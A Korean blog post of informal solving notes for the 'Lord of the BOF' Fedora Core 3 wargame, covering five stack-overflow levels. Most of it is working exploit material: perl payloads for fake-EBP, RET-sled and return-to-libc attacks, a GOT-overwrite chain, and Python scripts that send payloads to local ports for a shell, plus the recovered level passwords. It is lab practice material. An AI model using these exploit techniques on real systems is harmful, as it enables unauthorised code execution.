본문
write up까지는 아니고, 그냥 문제풀면서 끄적였던 것들 올립니다.
그 누군가에게는 힌트가 될수도 있겠죠;;;;-0-;....
maybe?;;ㅎ
-------------------------------------------------------------------------------------
[FC3 - 총 5문제]
* FC1~FC3까지 동일 환경이기 때문에 FC3 환경에서부터 시작합니다.
[주소]
http://work.hackerschool.org/DOWNLOAD/TheLordOfTheBOF/VM_FC3.zip
[환경 요약]
Stack Dummy : O
Down privileage of bash : O
Random Stack : O
Random Library : X
Random Program Binary Mapped : X
ASCII Armor : O
Non-Executable Stack : O
Non-Executable Heap : O
Stack Carany : X
Stack Smashing Protector : X
[몹들]
gate -> iron_golem : Fake_SFP + Ascii Armor
iron_golem -> dark_eyes : RET Sleding
dark_eyes -> hell_fire : another fake_ebp or got overwriting
hell_fire -> evil_wizard : POP POP RET
evil_wizard -> dark_stone : POP POP RET / Remote
===================================================================================
[gate@Fedora_1stFloor ~]$ cat iron_golem.c
/*
The Lord of the BOF : The Fellowship of the BOF
- iron_golem
- Local BOF on Fedora Core 3
- hint : fake ebp
*/
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[gate@Fedora_1stFloor ~]$
==================================================================================
흠...
leave, ret로 fake stack을참조하도록 변경.
strcpy로 system function address copy.
흠냥..역쉬....머리속에 있던거랑 실제 해보러니 많이 다르네.......정리 좀 하자..
fake ebp라....흠..그냥 RTL로도 될거같긴한데..아..그냥 RTL은 ascii armor 때문에 힘든가..
$1 = {<text variable, no debug info>} 0x7a5720 <execl>
일단 EIP 까지는 바꿀 수 있다. 마지막에 자동으로 00이 들어가기 때문에 execl 까지는 호출 가능.
"`perl -e '{print "A"x264,"B"x4,"\x20\x57\x7a" }'`"
그러나 execl 내부에서 아규먼트들을 참조하다가 죽는것 같다.
execl 함수를 보면, ebp를 기준으로 변수들을 참조하는데, 함수의 프롤로그에서
0x007a5720 <execl+0>: push %ebp
0x007a5721 <execl+1>: mov %esp,%ebp
와 같이 현재 esp를 ebp로 설정하는 부분이 있다.
그렇다면, execl+3 부분으로 점프를 하고, ebp를 main함수의 leave, ret에 의해 바뀔 때 적절한 값으로 바꾼다면, exploit 가능할 것으로 보인다.
0x8048d80: 0x00000000 0x0804851c 0x00000000 0x000e0003
(gdb) x/x 0x0804851c
0x804851c <_fp_hw>: 0x00000003
[gate@Fedora_1stFloor ~]$ ./tttt_ttttt "`perl -e '{print "A"x264,"\x80\x8d\x04\x08","\x23\x57\x7a" }'`"
ebp를 아무 영역이나 잡았더니, fake된 ebp에 write하면서 오류가 나는 것 같다.
write 가능한 영역을 찾아야겠다.
[gate@Fedora_1stFloor ~]$ cat /proc/26478/maps
00703000-00718000 r-xp 00000000 fd:00 68707 /lib/ld-2.3.3.so
00718000-00719000 r--p 00014000 fd:00 68707 /lib/ld-2.3.3.so
00719000-0071a000 rw-p 00015000 fd:00 68707 /lib/ld-2.3.3.so
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
00841000-00843000 rw-p 00841000 00:00 0
08048000-08049000 r-xp 00000000 fd:00 424355 /home/gate/tttt_ttttt
08049000-0804a000 rw-p 00000000 fd:00 424355 /home/gate/tttt_ttttt --> 여기.
f6ff8000-f6ff9000 rw-p f6ff8000 00:00 0
fee28000-ff000000 rw-p fee28000 00:00 0
ffffe000-fffff000 ---p 00000000 00:00 0
0x80492e0: 0x08049620 0x00000000 0x962425ff 0x00680804
(gdb) x/x 0x08049620
0x8049620 <_GLOBAL_OFFSET_TABLE_+8>: 0x0070e9e0
(gdb)
"`perl -e '{print "A"x264,"\xd8\x92\x04\x08","\x23\x57\x7a" }'`"
strace로 보면 execve까지 잘 와서 잘 되는 것 같은데...갑자기 segmentation fault가 뜬다..stack이 꼬이면서 문제가 생기나..
core에서 접근하면 해당 메모리에 접근이 안된다... 뭔가 쓰면 안되는 부분인가보다.
15 .ctors 00000008 08049538 08049538 00000538 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dtors 00000008 08049540 08049540 00000540 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .jcr 00000004 08049548 08049548 00000548 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dynamic 000000c8 0804954c 0804954c 0000054c 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .got 00000004 08049614 08049614 00000614 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got.plt 0000001c 08049618 08049618 00000618 2**2
CONTENTS, ALLOC, LOAD, DATA
21 .data 0000000c 08049634 08049634 00000634 2**2
CONTENTS, ALLOC, LOAD, DATA
를 참조해서 다시 해보자.
0x8049618 <_GLOBAL_OFFSET_TABLE_>: 0x0804954c 0x00000000 0x00000000 0x080482ee
(gdb) x/x 0x0804954c
0x804954c <_DYNAMIC>: 0x00000001
"`perl -e '{print "A"x264,"\x10\x96\x04\x08","\x23\x57\x7a" }'`"
[gate@Fedora_1stFloor ~]$ ./iron_golem "`perl -e '{print "A"x264,"\x10\x96\x04\x08","\x23\x57\x7a" }'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?Wz
bash-3.00$ id
uid=501(iron_golem) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t
bash-3.00$ whoami
iron_golem
bash-3.00$ my-pass
euid = 501
blood on the fedora
bash-3.00$
bash-3.00$
이 방법 이외에도 ret sled를 이용해 적당한 stack이 올 때까지 sled 하는 방법도 존재한다.
-> 이 방법이 더 심플해보인다.
또 다른 방법은 없을까?..
=============================================================
[iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark_eyes
- Local BOF on Fedora Core 3
- hint : RET sleding
*/
int main(int argc, char *argv[])
{
char buffer[256];
char saved_sfp[4];
if(argc < 2){
printf("argv error\n");
exit(0);
}
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, argv[1]);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
printf("%s\n", buffer);
}
[iron_golem@Fedora_1stFloor ~]$
첫번째 문제에서 대안으로 제안했던 방법이네..
0x080484b9 <main+177>: ret
$1 = {<text variable, no debug info>} 0x7507c0 <system>
$2 = {<text variable, no debug info>} 0x7a5720 <execl>
"`perl -e '{print "A"x264,"BBBB","\xb9\x84\x04\x08","\x20\x57\x7a" }'`"
execl 함수 대신, system 함수를 넣고(에러 메시지를 확인하기 위해서),
RET sled 를 하나씩 증가시켜가며, 스택이 변하지 않는 부분을 찾아낸다.
[iron_golem@Fedora_1stFloor ~]$ ./tttt_tttt "`perl -e '{print "A"x264,"BBBB","\xb9\x84\x04\x08"x8,"\xc0\x07\x75" }'`" 2>out
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(묛꽮뭐뭐뭐?u
Segmentation fault
[iron_golem@Fedora_1stFloor ~]$ xxd out
0000000: 7368 3a20 85c0 757b 658b 3554 3a20 636f sh: ..u{e.5T: co
0000010: 6d6d 616e 6420 6e6f 7420 666f 756e 640a mmand not found.
[iron_golem@Fedora_1stFloor ~]$ ln -s /home/iron_golem/a.out `perl -e '{print "\x85\xc0\x75\x7b\x65\x8b\x35\x54"}'`
[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "`perl -e '{print "A"x264,"BBBB","\xb9\x84\x04\x08"x8,"\x20\x57\x7a" }'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?詰뭐뭐뭐뭐 Wz
bash-3.00$ id
uid=502(dark_eyes) gid=501(iron_golem) groups=501(iron_golem) context=user_u:system_r:unconfined_t
bash-3.00$ whoami
dark_eyes
bash-3.00$ /bin/m
mail mkdir mknod mktemp more mount mt mv my-pass
bash-3.00$ /bin/my-pass
euid = 502
because of you
bash-3.00$
==============================================================
[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- hell_fire
- Remote BOF on Fedora Core 3
- hint : another fake ebp or got overwriting
- port : TCP 7777
*/
#include <stdio.h>
int main()
{
char buffer[256];
char saved_sfp[4];
char temp[1024];
printf("hell_fire : What's this smell?\n");
printf("you : ");
fflush(stdout);
// give me a food
fgets(temp, 1024, stdin);
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, temp);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
printf("%s\n", buffer);
}
[dark_eyes@Fedora_1stFloor ~]$
[dark_eyes@Fedora_1stFloor ~]$
[temp][saved_sfp][buffer][sfp][ret][88byte][sfp][ret]
원격으로 실행되니 스택보다는 고정된 주소를 사용하는게 좋아보이는데..pop-pop-ret 이후 leave, ret로 점프하여 ebp를 바꿀 수 있을 것 같다.
remote이긴 하지만, 좀 이상한 remote인듯?ㅋㅋ
15 .ctors 00000008 08049674 08049674 00000674 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dtors 00000008 0804967c 0804967c 0000067c 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .jcr 00000004 08049684 08049684 00000684 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dynamic 000000c8 08049688 08049688 00000688 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .got 00000004 08049750 08049750 00000750 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got.plt 00000024 08049754 08049754 00000754 2**2
CONTENTS, ALLOC, LOAD, DATA
21 .data 0000000c 08049778 08049778 00000778 2**2
CONTENTS, ALLOC, LOAD, DATA
0x8049754 <_GLOBAL_OFFSET_TABLE_>: 0x08049688 0x007194f8 0x0070e9e0 0x08048382
(gdb) x/x 0x08049688
0x8049688 <_DYNAMIC>: 0x00000001
0x08048559 <main+213>: call 0x80483ac <_init+88>
0x0804855e <main+218>: add $0x10,%esp
0x08048561 <main+221>: leave
0x08048562 <main+222>: ret
0x08048563 <main+223>: nop
$1 = {<text variable, no debug info>} 0x7507c0 <system>
$2 = {<text variable, no debug info>} 0x7a5720 <execl>
"`perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","\x4c\x97\x04\x08","\xc3\x07\x75" }'`"
이렇게 하면 leave,ret에 의해 esp가 바뀌어버려서 안된다.
fake ebp를 할 수 있는 방법이 어떤게 있을까?...got overwrite는 또 어떻게 할 수 있지?-_-;
일단 첫번째 솔루션 먼저 고민해보자..
일단, 기본적인 sfp는 복구된다.
ret 주소를 leave, ret로 하면 스택이 main함수를 호출했던 함수의 이전 상태로 복구된다.
그럼 그 이후까지 덮어쓰게 되면, ret
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x800}'
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9ABa0Ba1Ba2Ba3Ba4Ba5B"}'
Cannot access memory at address 0x64413967
(gdb) i r
No selected frame.
(gdb) print $esp
$1 = (void *) 0xfef1169c
(gdb) print $ebp
$2 = (void *) 0x64413963
Pattern 'c9Ad' found at offset(s) : 88
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x88,"\x4c\x97\x04\x08","\x23\x57\x7a\x00"}'
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x88,"\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
흠..로컬에선 잘 되는데...리모트라............파일을 찾을 수 없다고 나온다.ㅡ.ㅡ;;
while true; do ./a.out >> stout; done;
(gdb) disassemble main
Dump of assembler code for function main:
0x08048484 <main+0>: push %ebp
0x08048485 <main+1>: mov %esp,%ebp
0x08048487 <main+3>: sub $0x518,%esp
0x0804848d <main+9>: and $0xfffffff0,%esp
0x08048490 <main+12>: mov $0x0,%eax
0x08048495 <main+17>: add $0xf,%eax
0x08048498 <main+20>: add $0xf,%eax
0x0804849b <main+23>: shr $0x4,%eax
0x0804849e <main+26>: shl $0x4,%eax
0x080484a1 <main+29>: sub %eax,%esp
0x080484a3 <main+31>: sub $0xc,%esp
0x080484a6 <main+34>: push $0x8048644
0x080484ab <main+39>: call 0x80483ac <_init+88> // printf
0x080484b0 <main+44>: add $0x10,%esp
0x080484b3 <main+47>: sub $0xc,%esp
0x080484b6 <main+50>: push $0x8048664
0x080484bb <main+55>: call 0x80483ac <_init+88> // printf
0x080484c0 <main+60>: add $0x10,%esp
0x080484c3 <main+63>: sub $0xc,%esp
0x080484c6 <main+66>: pushl 0x8049784
0x080484cc <main+72>: call 0x804837c <_init+40> // fflush
0x080484d1 <main+77>: add $0x10,%esp
0x080484d4 <main+80>: sub $0x4,%esp
0x080484d7 <main+83>: pushl 0x8049788
0x080484dd <main+89>: push $0x400
0x080484e2 <main+94>: lea 0xfffffae8(%ebp),%eax
0x080484e8 <main+100>: push %eax
0x080484e9 <main+101>: call 0x804838c <_init+56> // fgets
0x080484ee <main+106>: add $0x10,%esp
0x080484f1 <main+109>: sub $0x4,%esp
0x080484f4 <main+112>: push $0x4
0x080484f6 <main+114>: lea 0xfffffef8(%ebp),%eax
0x080484fc <main+120>: add $0x108,%eax
0x08048501 <main+125>: push %eax
0x08048502 <main+126>: lea 0xfffffef4(%ebp),%eax
0x08048508 <main+132>: push %eax
0x08048509 <main+133>: call 0x80483bc <_init+104> // memcpy
0x0804850e <main+138>: add $0x10,%esp
0x08048511 <main+141>: sub $0x8,%esp
0x08048514 <main+144>: lea 0xfffffae8(%ebp),%eax
0x0804851a <main+150>: push %eax
0x0804851b <main+151>: lea 0xfffffef8(%ebp),%eax
0x08048521 <main+157>: push %eax
0x08048522 <main+158>: call 0x80483cc <_init+120> // strcpy
0x08048527 <main+163>: add $0x10,%esp
0x0804852a <main+166>: sub $0x4,%esp
0x0804852d <main+169>: push $0x4
0x0804852f <main+171>: lea 0xfffffef4(%ebp),%eax
0x08048535 <main+177>: push %eax
0x08048536 <main+178>: lea 0xfffffef8(%ebp),%eax
0x0804853c <main+184>: add $0x108,%eax
0x08048541 <main+189>: push %eax
0x08048542 <main+190>: call 0x80483bc <_init+104> // memcpy
0x08048547 <main+195>: add $0x10,%esp
0x0804854a <main+198>: sub $0x8,%esp
0x0804854d <main+201>: lea 0xfffffef8(%ebp),%eax
0x08048553 <main+207>: push %eax
0x08048554 <main+208>: push $0x804866b
0x08048559 <main+213>: call 0x80483ac <_init+88> // printf
0x0804855e <main+218>: add $0x10,%esp
0x08048561 <main+221>: leave
0x08048562 <main+222>: ret
0x08048563 <main+223>: nop
End of assembler dump.
(gdb)
perl -e '{print "A"x264,"BBBB","\xf4\x84\x04\x08","A"x88,"\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
perl -e '{print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7","BBBB","\xf4\x84\x04\x08","Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8A","\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
perl -e '{print "A"x264,"BBBB","\x09\x85\x04\x08","A"x88,"\x4c\x97\x04\x08","\xc3\x07\x75\x00"}'
0x080484e2
"\xe2\x84\x04\x08"
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x4,"B"x4,"C"x4,"A"x76,"\x88\x9c\x04\x08","\xe2\x84\x04\x08","\x01\x01\x01\x01","\x88\x97\x04\x08","B"x20}' > in
-1304
./tttt_tttt: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049750 R_386_GLOB_DAT __gmon_start__
08049784 R_386_COPY stdout
08049788 R_386_COPY stdin
08049760 R_386_JUMP_SLOT fflush
08049764 R_386_JUMP_SLOT fgets
08049768 R_386_JUMP_SLOT __libc_start_main
0804976c R_386_JUMP_SLOT printf
08049770 R_386_JUMP_SLOT memcpy
08049774 R_386_JUMP_SLOT strcpy
8049C88
perl -e '{print "A"x264,"BBBB","\xe9\x84\x04\x08","\x74\x97\x04\x08", "\x01\x01\x01\x01","\x20\xf7\x83\x00"}' > in
perl -e '{print "A"x264,"BBBB","\x61\x85\x04\x08","A"x4,"B"x4,"C"x4,"A"x76,"\x88\x9c\x04\x08","\xe9\x84\x04\x08","\x74\x97\x04\x08", "\x01\x01\x01\x01","\x20\xf7\x83\x00"}' > in
[dark_eyes@Fedora_1stFloor ~]$ cat test.py
#!/usr/bin/python
#cmd_sub.py
import os
import time
import popen2
def execute(cmd) :
std_out, std_in, std_err = popen2.popen3(cmd)
return std_in, std_out, std_err
cmd = "./tttt_tttt"
std_in, std_out, std_err = execute(cmd)
#first_payload = "A"*264
first_payload = "/bin/sh;"*(264/8)
first_payload += "BBBB"
first_payload += "\x62\x85\x04\x08"*24
first_payload += "\xe9\x84\x04\x08"
first_payload += "\x70\x97\x04\x08"
first_payload += "\x01\x01\x01\x01"
first_payload += "\x20\xf7\x83\x00"
first_payload += "B"*20
'''
first_payload = "A"*264
first_payload += "BBBB"
first_payload += "\x61\x85\x04\x08"
first_payload += "A"*88
first_payload += "\x88\x9c\x04\x08"
first_payload += "\xe9\x84\x04\x08"
first_payload += "\x74\x97\x04\x08"
first_payload += "\x01\x01\x01\x01"
first_payload += "\x20\xf7\x83\x00"
first_payload += "B"*20
'''
second_payload = "\xc3\x07\x75\x00"
print "first payload : ", first_payload
print "second payload : ", second_payload
print std_out.readline()
std_out.flush()
std_in.write(first_payload)
std_in.write("\n")
std_in.flush()
std_in.write(second_payload)
std_in.write("\n")
std_in.flush()
print std_err.readline()
std_in.write("ls")
std_in.write("\n")
std_in.flush()
print std_out.readline()
print std_out.readline()
print std_out.readline()
[dark_eyes@Fedora_1stFloor ~]$ cat remote.py
#!/usr/bin/python
import socket
import telnetlib
first_payload = "/bin/sh;"*(264/8)
first_payload += "BBBB"
first_payload += "\x62\x85\x04\x08"*24
first_payload += "\xe9\x84\x04\x08"
first_payload += "\x70\x97\x04\x08"
first_payload += "\x01\x01\x01\x01"
first_payload += "\x20\xf7\x83\x00"
first_payload += "B"*20
second_payload = "\xc3\x07\x75\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 7777))
data = s.recv(1024)
print "READ : ",data
#print "SEND", buffer
s.send(first_payload + "\n")
#data = s.recv(1024)
#print "READ : ",data
s.send(second_payload + "\n")
t = telnetlib.Telnet()
t.sock= s
t.interact()
t.close()
s.close()
드디어 풀었다..+_+...2013.10.10 AM 01:00
whoami
hell_fire
/bin/my-pass
euid = 503
sign me up
=================================================================================================
[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
The Lord of the BOF : The Fellowship of the BOF
- evil_wizard
- Local BOF on Fedora Core 3
- hint : GOT overwriting
*/
// magic potion for you
void pop_pop_ret(void)
{
asm("pop %eax");
asm("pop %eax");
asm("ret");
}
int main(int argc, char *argv[])
{
char buffer[256];
char saved_sfp[4];
int length;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// for disturbance RET sleding
length = strlen(argv[1]);
// healing potion for you
setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, argv[1]);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
// disturbance RET sleding
memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));
printf("%s\n", buffer);
}
[hell_fire@Fedora_1stFloor ~]$
perl -e '{print "A"x264,"BBBB","\x93\x86\x04\x08","A"x88,"\x68\x98\x04\x08","\xc3\x07\x75\x00"}'
그냥 fake_ebp로 풀었다.
[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard "`perl -e '{print "A"x264,"BBBB","\x93\x86\x04\x08","A"x88,"\x64\x98\x04\x08","\x23\x57\x7a\x00"}'`"
[evil_wizard@Fedora_1stFloor hell_fire]$ id
uid=504(evil_wizard) gid=504(evil_wizard) groups=503(hell_fire) context=user_u:system_r:unconfined_t
[evil_wizard@Fedora_1stFloor hell_fire]$ whoami
evil_wizard
[evil_wizard@Fedora_1stFloor hell_fire]$ /bin/my-pass
euid = 504
get down like that
[evil_wizard@Fedora_1stFloor hell_fire]$
흠...정석은 pop-pop-ret을 써서 푸는것 같은데......어떻게 하는거지?;-_-;
strcpy@plt로 점프하나?..
strcpy@plt로 점프하면서
==============================================================================
[evil_wizard@Fedora_1stFloor ~]$ cat dark_stone.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark_stone
- Remote BOF on Fedora Core 3
- hint : GOT overwriting again
- port : TCP 8888
*/
#include <stdio.h>
// magic potion for you
void pop_pop_ret(void)
{
asm("pop %eax");
asm("pop %eax");
asm("ret");
}
int main()
{
char buffer[256];
char saved_sfp[4];
int length;
char temp[1024];
printf("dark_stone : how fresh meat you are!\n");
printf("you : ");
fflush(stdout);
// give me a food
fgets(temp, 1024, stdin);
// for disturbance RET sleding
length = strlen(temp);
// save sfp
memcpy(saved_sfp, buffer+264, 4);
// overflow!!
strcpy(buffer, temp);
// restore sfp
memcpy(buffer+264, saved_sfp, 4);
// disturbance RET sleding
memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));
// buffer cleaning
memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);
printf("%s\n", buffer);
}
[evil_wizard@Fedora_1stFloor ~]$
이번엔 pop-pop-ret로 풀어주지....근데 위 문제랑 뭐가 다른거지ㅡㅡ;
(gdb) disassemble pop_pop_ret
Dump of assembler code for function pop_pop_ret:
0x080484f0 <pop_pop_ret+0>: push %ebp
0x080484f1 <pop_pop_ret+1>: mov %esp,%ebp
0x080484f3 <pop_pop_ret+3>: pop %eax
0x080484f4 <pop_pop_ret+4>: pop %eax
0x080484f5 <pop_pop_ret+5>: ret
0x080484f6 <pop_pop_ret+6>: leave
0x080484f7 <pop_pop_ret+7>: ret
End of assembler dump.
[evil_wizard@Fedora_1stFloor ~]$ (./exploit.py ;cat)| nc localhost 8888
whoami
dark_stone
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
/bin/my-pass
euid = 505
let there be light
[evil_wizard@Fedora_1stFloor ~]$ cat exploit.py
#!/usr/bin/python
import struct
p = lambda x : struct.pack("<L" , x)
# system address in libc : 0x007507c0
# /bin/sh in libc : 0x0071c000 (base) + 0x00117603 (offset) = 0x833603
pop_pop_ret = 0x080484f3 # "\xf3\x84\x04\x08"
strcpy_plt = 0x08048438 # "\x38\x84\x04\x08"
memcpy_got = 0x08049850 # "\x50\x98\x04\x08"
memcpy_plt = 0x8048418
system_0 = 0x8048508 # 0x00
system_1 = 0x80486bf # 0x75
system_2 = 0x8048394 # 0x07
system_3 = 0x804850d # 0xc0
payload = "A"*264 + p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 0) + p(system_3) + \
p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 1) + p(system_2) + \
p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 2) + p(system_1) + \
p(strcpy_plt) + p(pop_pop_ret) + p(memcpy_got + 3) + p(system_0) + \
p(memcpy_plt) + "A"*4 + p(0x833603)
print payload
이게 마지막 문제구나..흣-..
'WarGame > The Lord Of The BOF' 카테고리의 다른 글
BOF 원정대 redhat write up. (0) | 2013.11.27 |
---|---|
[wargame/BOF원정대] bugbear -> giant (0) | 2013.10.02 |
BOF 원정대 클리어. (0) | 2013.10.01 |